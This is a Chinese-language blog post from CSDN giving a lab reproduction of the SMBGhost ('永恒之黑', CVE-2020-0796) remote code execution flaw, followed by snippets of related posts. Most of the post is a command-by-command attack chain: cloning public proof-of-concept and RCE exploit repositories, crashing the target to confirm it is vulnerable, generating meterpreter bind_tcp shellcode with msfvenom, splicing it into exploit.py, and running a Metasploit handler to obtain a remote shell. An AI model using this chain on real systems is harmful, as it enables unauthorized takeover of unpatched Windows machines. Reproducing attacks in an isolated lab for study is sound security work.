永恒之黑漏洞复现

已于 2023-02-15 14:21:34 修改
阅读量615 收藏 4
点赞数 2
文章标签: 网络 web安全 运维 Powered by 金山文档
于 2023-02-15 00:28:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zhaokangkang123/article/details/129035601
版权
该文详细描述了如何利用KaliLinux攻击Windows10系统,通过下载和执行特定的POC脚本来检测和利用永恒之黑漏洞(CVE-2020-0796),然后使用msfvenom生成shellcode,结合metasploit框架建立监听并获取shell权限的过程。
摘要由CSDN通过智能技术生成
一,实验环境

攻击机:kail 192.168.227.132

靶机:win10  1903(关闭防火墙)192.168.227.137

二,复现过程
1,在kali终端下载 POC和Getshell
git clone https://github.com/eerykitty/CVE-2020-0796-PoC
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC

已经下载过会显示已存在,并保留在桌面上

2,利用python脚本测试靶机是否存在永恒之黑漏洞

靶机IP如何获取这里就不演示了

python3 CVE-2020-0796.py 靶机IP

靶机出现蓝屏说明存在永恒之黑漏洞

3,使用msfvenom生成python类型(-f python)的shellcode.txt文件
msfconsole
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt

1.打开桌面上的CVE-2020-0796-PoC文件夹中的shellcode.txt文件,复制全部内容。

2.打开桌面上的SMBGhost_RCE_PoC文件夹中的exploit.py,将其中的USER_PAYLOAD字段全部删除,将刚刚复制的shellcode.txt内容粘贴进去

3.将文件中的buf全部改为USER_PAYLOAD

4,进入kali中的msf模块打开监听模块
use exploit/multi/handler #选择监听模块
set payload windows/x64/meterpreter/bind_tcp #使用监听模块
set lport 4444  #监听端口
set rhost 靶机IP #被监听主机
run #运行

若最后一行代码迟迟加载不出来,可试着按下enter键

出现meterpreter >说明已经建立了一个会话连接

5,获取shell权限
shell

攻击完成!

谁在称无敌?
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
永恒永恒之蓝 完整复现流程
Continuejww的博客
09-19 1149
充当攻击机的机器是kali,另外需要关闭防火墙策略。
漏洞复现】CVE-2020-0796永恒漏洞复现
weixin_67698311的博客
06-18 2410
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
2024年最新网络安全学习day6——永恒漏洞复现,2024年最新下血本买的
最新发布
2401_84968612的博客
05-16 811
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
CVE-2020-0796永恒漏洞复现 超详细过程(成功复现
unlash的博客
10-20 5378
CVE-2020-0796永恒漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
Kali:简单实现永恒复现漏洞CVE-2020-0796
2201_75638644的博客
03-12 1253
Kali:简单实现永恒复现漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒(CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
CVE-2020-0976永恒漏洞复现
qq_36918532的博客
03-13 4039
漏洞原理 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 影响版本 Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标 漏洞所需工具 漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0
infoq 架构师 2014年月刊收集
11-02
5. 高并发与高性能系统设计:对于架构师来说,如何构建能够处理大规模并发访问的系统是永恒的话题。2014年的月刊可能涵盖负载均衡、缓存策略、异步处理等关键技术。 6. 安全与隐私保护:随着数据泄露事件频发,安全...
渗透测试培训介绍
07-26
视频可能介绍了如何利用Windows漏洞,如MS17-010(永恒之蓝)来实现远程代码执行。 远控技术在渗透测试中扮演着关键角色。远程桌面协议(RDP)、SSH、VNC等都是常见的远控方式,它们允许测试人员在远程位置控制目标...
Matlab实现血管骨架提取
11-21
MATLAB中的`imbinarize`函数可以实现二值化,将图像转化为(背景)和白(血管)两部分。 2. **边缘检测**:边缘检测算法如Sobel、Canny和Prewitt等可以找到图像中亮度变化剧烈的地方,这些地方往往是血管边界。...
win2008R2安全补丁
03-14
windows6.1-kb4486564-x64_ad686ee44cfd554e461c55d1975d377b68af5eca.msu windows6.1-kb4480960-x64_bd23adfd0d82403d58aa8cd649636d136cf77700.msu win2008r2安全补丁
2.11 ISO9001_2015  10  持续改进.pdf
04-21
最后,持续改进是组织永恒的主题,需要定期评估质量管理体系,寻找新的改进方向和机会。 总结起来,ISO9001:2015的持续改进要求组织不断学习、适应和进化,确保其产品和服务始终符合或超过顾客的期待,同时通过有效...
永恒复现
qq_67181251的博客
05-07 2065
二进制漏洞是可执行文件(PE、ELF文件等)因编码时考虑不周,造成的软件执行了非预期的功能。由于二进制漏洞大都涉及到系统层面,所以危害程度比较高。比如经典的office栈溢出漏洞(CVE-2012-0158)、(CVE-2017-11882)以及(CVE-2017-11882)的补丁绕过漏洞(CVE-2018-0802)等,都是危险程度极高的0day和1day漏洞。栈溢出漏洞(Stack-Overflow)堆溢出漏洞(Heap-Overflow)释放后重引用漏洞(Use-After-Free)
CVE-2020-0796(永恒)漏洞复现
m0_73263892的博客
06-30 637
靶机:win 10攻击机:kalipython脚本:链接:https://pan.baidu.com/s/1GgInswJJC2RkSGdJk1_V5g?pwd=kt4r提取码:kt4r。
网络安全学习day6——永恒漏洞复现,腾讯T3手把手教你
2301_76190672的博客
04-09 778
1)环境搭建2) 查看win10和kali能否相互ping通3)使用工具检查靶机是否存在漏洞发现win10出现蓝屏,则证明漏洞存在4) kali进入msf,使用msf生成反向连接木马,命令如下:说明:#-e 编码方式#-i 编码次数#-b 在生成的程序中避免出现的值#LHOST,LPORT 监听上线的主机IP和端口#-f exe 生成EXE格式#‘\x00‘转义字符,对应ascall码中为null,因为是二进制文件所以会出现,在python中作为结束的标志,有点相当于%00截断的感觉。
永恒漏洞复现&漏洞描述
couldt的博客
04-17 585
渗透测试,漏洞复现
CVE-2020-0796永恒漏洞复现
Martin-share的博客
02-15 918
2020年3月12日,微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒”。本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒一旦被成功利用,其危害不亚于永恒之蓝。受影响版本:set lhost。
kali复现CVE-2020-0796 永恒
m0_57856283的博客
03-13 4064
3.1 永恒简介 2017 年,“永恒之蓝”,3 年之后,“永恒” 来了; 介绍:3 月 12 日, 微软披露了一个最新的 SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗 称“永恒”。 本漏洞源于 SMBv3 没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用漏洞,攻击方可直接远程攻击 SMB 服务端远程执行任意恶意代码,亦可通过构建恶意 SMB 服务端...
[ MSF使用实例 ] 利用永恒采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost)
qq_51577576的博客
10-19 1146
[ MSF使用实例 ] 利用利用SMBv3远程代码执行漏洞(SMBGhost)(CVE-2020-0796)(永恒)采用正向连接 shell 获得主机权限 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 SMBGhost
smbghost永恒复现
weixin_49891807的博客
07-02 1339
SMB 3.1.1协议处理某些请求的方式中存在远程执行代码漏洞,可能被攻击者利用远程执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,故也称永恒。 影响范围: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows S
msf win10漏洞_永恒:CVE20200796漏洞复现
05-28
这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。 其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。 最后,您可以按照以下步骤进行CVE-2020-0796漏洞复现: 1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。 2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置: set RHOSTS [目标IP地址] set RPORT 445 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [攻击机IP地址] 3. 运行exploit命令,进行漏洞利用。 请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值